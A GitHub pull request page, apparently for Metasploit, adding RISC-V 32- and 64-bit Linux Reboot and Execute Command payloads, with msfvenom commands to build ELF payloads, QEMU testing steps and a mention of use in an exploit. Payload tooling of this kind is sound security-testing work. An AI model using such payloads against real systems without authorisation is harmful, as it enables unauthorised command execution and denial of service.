-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add support for RISC-V 32-bit / 64-bit Little Endian payloads #19518
base: master
Are you sure you want to change the base?
Conversation
This PR is ready for testing. Tests are passing, with the exception of an unrelated PHP-related test which failed after 15+ minutes. HardwareMilk-V and Pine64 sell cheap (US$10) RISC-V boards capable of running Linux + userland utlities. Tested on:
EmulationQEMUQEMU supports RISC-V. QEMU versions 8.2.93 and 9.1.50 emulate RISC-V well. Debian Quick Image Baker images can be used to easily emulate a Debian RISC-V Linux system. Ubuntu and Fedora images are also available. I can provide QEMU command line arguments for these if required. TinyEMUAlso tested with tinyemu: |
@dwelch-r7, if you happen to create an emulated RISC-V Ubuntu VM, could I talk you into installing kernel 5.19 and testing #19460 ? 😄 |
FWIW; here's a working QEMU invocation for Ubuntu 22.04.1 Server with
Use the commented You may need the |
|
I've also added Linux Execute Command 32-bit/64-bit RISC-V LE payloads. @bwatters-r7 These payloads should be useful for the Overlay exploit. Both payloads were tested successfully in an emulator. The 64-bit payload was also tested on real hardware. Linux Execute Command (64-bit)
Linux Execute Command (32-bit)
|
89f98f3
to
4831d26
Compare
Add support for RISC-V 32-bit / 64-bit Little Endian payloads. Includes Linux Execute Command payloads and Linux Reboot payloads for testing.
riscv32
successfullyriscv64
successfullyNote: We don't handle
syscall
failure or callexit
. This saves a few bytes.Note: Executing 32-bit payloads in a 64-bit environment will fail.
Note: Executing the Linux Reboot payloads as a low privileged user will crash.
reboot
is a privileged syscall.Note: Executing the Linux Execute Command payloads in a Linux environment where
/bin/sh
is a symlink to BusyBox/bin/busybox
(such as MilkV Duo default image) will crash. This is a WontFix for me. For testing purposes, you can work around this with:sudo cp /bin/sh /bin/sh.old && sudo cp /bin/bash /bin/sh
.Motivation
This PR lays the foundation for further development of RISC-V payloads.
RISC-V is gaining popularity. Major Linux distributions (Ubuntu, Debian, and Fedora) offer RISC-V development builds. RISC-V based SBCs and consumer-grade laptops are slowly entering the market.
Verification
Linux Reboot
Generate a Linux Reboot payload (with optional NOP sled):
./msfvenom -n 100 --format elf -p linux/riscv64le/reboot > reboot.elf
Execute the payload with QEMU (I suggest doing this within an emulated Linux environment):
/home/user/qemu/build/qemu-riscv64 -strace ./reboot
sudo /home/user/qemu/build/qemu-riscv64 -strace ./reboot
Linux Execute Command
Generate a Linux Execute Command payload (with optional NOP sled):
./msfvenom --format elf -p linux/riscv64le/exec "CMD=echo Hello, World\!>/tmp/asdf" > exec.elf
Execute the payload with QEMU (optionally within an emulated Linux environment):
/home/user/qemu/build/qemu-riscv64 -strace ./exec
Hello, World!
should now exist in/tmp/asdf
.Linux Reboot
Source (64-bit)
Source (32-bit)
Linux Execute Command
Source (64-bit)
Uses modexp's RISC-V 64-bit shellcode.
Source (32-bit)
Uses modexp's RISC-V 64-bit shellcode modified for RISC-V 32-bit.